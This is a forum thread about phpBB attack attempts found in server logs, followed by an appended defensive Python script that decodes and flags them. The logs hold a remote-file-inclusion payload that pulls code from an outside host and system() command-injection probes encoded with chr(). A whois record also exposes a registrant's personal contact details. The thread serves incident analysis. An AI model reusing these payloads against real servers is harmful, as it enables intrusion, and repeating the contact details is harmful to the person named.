Topic: Attempted Hack

My bandwidth had a big spike, so I trawled through logs and found lots of these:

38.112.131.75 - - "GET /forum/viewtopic.php?pid=1197&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 31309 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t f**k Aleks)"

(I edited the swear word there)

What were they intending to do?

2

Re: Attempted Hack

They were trying to hack into phpBB ;)

3 (edited by MathsIsFun 2005-12-11 10:50)

Re: Attempted Hack

Ahh ... were they being silly, then?

I think all they managed to do was to use a little bandwidth. Potentially nasty stuff, though ... I imagine PunBB is immune to this kind of attack.

Note: IP was different for each log entry, so they were spoofing that.

Any clues as to tracking these criminals down?

Re: Attempted Hack

The file "http://www.yatas.com/phpbb_private.txt" is:

<body bgcolor="black">
<center><img src="http://sinanreklam.net/images/owned.jpg"><br><font color="white" size="3">hehehehe</center>
</body>

And a whois on yatas.com reveals:

Registrant:
     Muammer OZTASKIN ahmetk@artmedya.com +90.2125075142
     Muammer OZTASKIN
     Keresteciler Sitesi Cinar Sokak
     Istanbul,TR,TR 34010


Domain Name:yatas.com
Record last updated at 2005-05-27 10:12:58
Record created on 1997/6/9
Record expired on 2010/6/9


Domain servers in listed order:
     ns.artmedya.com      ns2.artmedya.com

Administrator:
     name:(Ahmet Karamanlargil)
    Email:(ahmetk@artmedya.com) tel-- +90.2125075142
     Artmedya Internet Reklamcilik Ltd Sti
     Keresteciler Sitesi Cinar Sokak

Re: Attempted Hack

Send an email over to the FBI.

Re: Attempted Hack

The same guy is doing something with my forum. I'll post back with more info soon.

Looking for a certain modification for your forum? Please take a look here before posting.

Re: Attempted Hack

Here's a shot of my BBClone log:

http://img273.imageshack.us/img273/4354/hacker2we.th.png

Same user agent string. It hits different pages on my forum, not just the index.

Re: Attempted Hack

Yep, the IP seems to be randomly generated.

Same file trying to be inserted: "http://www.yatas.com/phpbb_private.txt" ?

We could possibly get that site shut down ... and try to follow the trail further.

9 (edited by snapsolutions 2006-03-20 03:49)

Re: Attempted Hack

I was going through my logs on my server and this is what is going on right now!

66.96.216.85 - - [19/Mar/2006:21:31:55 -0500] "GET /viewtopic.php?pid=3879&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
66.98.198.79 - - [19/Mar/2006:21:32:07 -0500] "GET /viewtopic.php?id=18&p=1&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
66.98.198.79 - - [19/Mar/2006:21:32:07 -0500] "GET /viewtopic.php?id=18&p=1&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
72.36.244.188 - - [19/Mar/2006:21:33:08 -0500] "GET /viewtopic.php?pid=6065&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
71.245.177.132 - - [19/Mar/2006:21:33:12 -0500] "GET /viewtopic.php?pid=3879&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
207.44.232.113 - - [19/Mar/2006:21:33:39 -0500] "GET /viewtopic.php?id=18&p=1&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
66.45.58.204 - - [19/Mar/2006:21:33:41 -0500] "GET /viewtopic.php?pid=6065&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"
216.235.248.186 - - [19/Mar/2006:21:38:24 -0500] "GET /viewtopic.php?id=18&p=1&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 702 "-" "Mozilla/4.0"
217.112.37.95 - - [19/Mar/2006:21:38:29 -0500] "GET /viewtopic.php?pid=6065&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 702 "-" "Mozilla/4.0"
64.38.19.234 - - [19/Mar/2006:21:38:54 -0500] "GET /viewtopic.php?id=18&p=2&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 702 "-" "Mozilla/4.0"
216.120.237.70 - - [19/Mar/2006:21:39:04 -0500] "GET /viewtopic.php?id=195&p=3&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 702 "-" "Mozilla/4.0"

I guess it's another phpBB attack :)
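Both sets of log lines in this thread (the `include($_GET[m])` line in the first post and the `system(chr(...))` lines just above) hit the same `highlight` parameter of phpBB's `viewtopic.php`, and both are double-URL-encoded so that a casual reader of the raw log sees only `%2527`/`%252E`. The script below is an added example, not code from anyone in this thread or from phpBB/PunBB: it parses Apache combined-format lines, decodes `highlight` as many times as needed, flags PHP code-execution constructs that never belong in a search term, and renders chained `chr()` calls as the literal string they build so an analyst can read what a probe tried to run. The sample input is the log line from the first post and two lines from the last post (verbatim), plus one constructed benign request; the regex and the list of suspicious tokens are my own choices, not anything the posters used.

```python
"""Triage helper for the phpBB 'highlight' exploit attempts shown in this thread.

Added example, not from the thread. Parses Apache combined-format log lines,
decodes the (double-URL-encoded) query string, flags code-execution constructs
and renders chr() chains as readable text.
"""
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Apache combined log format; the timestamp field is optional because the
# first post's line was pasted without it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ (?:\[(?P<time>[^\]]+)\] )?'
    r'"(?P<method>[A-Z]+) (?P<url>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Tokens that have no business in a search-highlight parameter (my own list).
SUSPICIOUS = ("include(", "require(", "system(", "passthru(", "exec(",
              "shell_exec(", "$_get", "$_post", "chr(", "http://", "https://")

CHR_RE = re.compile(r'chr\((\d+)\)')

# Sample input: lines 1-3 are copied from the thread, line 4 is constructed.
SAMPLE_LINES = [
    '38.112.131.75 - - "GET /forum/viewtopic.php?pid=1197&highlight=%2527.$poster=include($_GET[m]).%2527&m=http://www.yatas.com/phpbb_private.txt?& HTTP/1.0" 200 31309 "http://www.google.nl/" "Mozilla/4.0 (modded by sirh0t f**k Aleks)"',
    '66.96.216.85 - - [19/Mar/2006:21:31:55 -0500] "GET /viewtopic.php?pid=3879&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 36481 "-" "Mozilla/4.0"',
    '216.235.248.186 - - [19/Mar/2006:21:38:24 -0500] "GET /viewtopic.php?id=18&p=1&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 702 "-" "Mozilla/4.0"',
    '10.0.0.5 - - [19/Mar/2006:21:40:00 -0500] "GET /viewtopic.php?id=18&highlight=punbb HTTP/1.0" 200 1200 "-" "Mozilla/5.0"',
]


def decode_param(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly: the thread's payloads go %2527 -> %27 -> '."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def render_chr(payload: str) -> str:
    """Replace chained chr(N).chr(M)... calls with the literal string they build."""
    return re.sub(
        r'(?:chr\(\d+\)\.?)+',
        lambda m: "".join(chr(int(n)) for n in CHR_RE.findall(m.group(0))),
        payload,
    )


def analyze(line: str) -> Optional[dict]:
    """Parse one log line; return None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    # parse_qs decodes one layer; decode_param strips the remaining layers.
    query = decode_param(parts.query)
    highlight = decode_param(parse_qs(parts.query, keep_blank_values=True)
                             .get("highlight", [""])[0])
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "status": int(m.group("status")),
        "ua": m.group("ua"),
        "highlight": highlight,
        "rendered": render_chr(highlight),
        "suspicious": sorted(s for s in SUSPICIOUS if s in query.lower()),
    }


def summarize(lines) -> dict:
    """Aggregate flagged requests: how many, from how many IPs, what they tried."""
    flagged = [r for r in map(analyze, lines) if r and r["suspicious"]]
    return {
        "flagged": len(flagged),
        "distinct_ips": len({r["ip"] for r in flagged}),
        "status_200": sum(1 for r in flagged if r["status"] == 200),
        "payloads": sorted({r["rendered"] for r in flagged}),
    }


if __name__ == "__main__":
    for ln in SAMPLE_LINES:
        r = analyze(ln)
        print(r["ip"], r["suspicious"], r["rendered"])
    print(summarize(SAMPLE_LINES))
```

Running it shows the first line trying to pull and `include()` a remote file named by the `m` parameter, and the later lines trying to run `perl -e "print q(jSVowMsd)"`, a harmless marker command whose only purpose is to tell the sender whether the server executed it. Two caveats for anyone reading their own logs this way: the `200` status means only that `viewtopic.php` rendered a page, not that the injected code ran (compare the response size with a normal request to the same topic, and check for unexpected files or outbound connections from the web server); and since these are completed HTTP requests, each source IP did complete a TCP handshake, so a different IP per request points to many proxies or compromised hosts rather than spoofed packets.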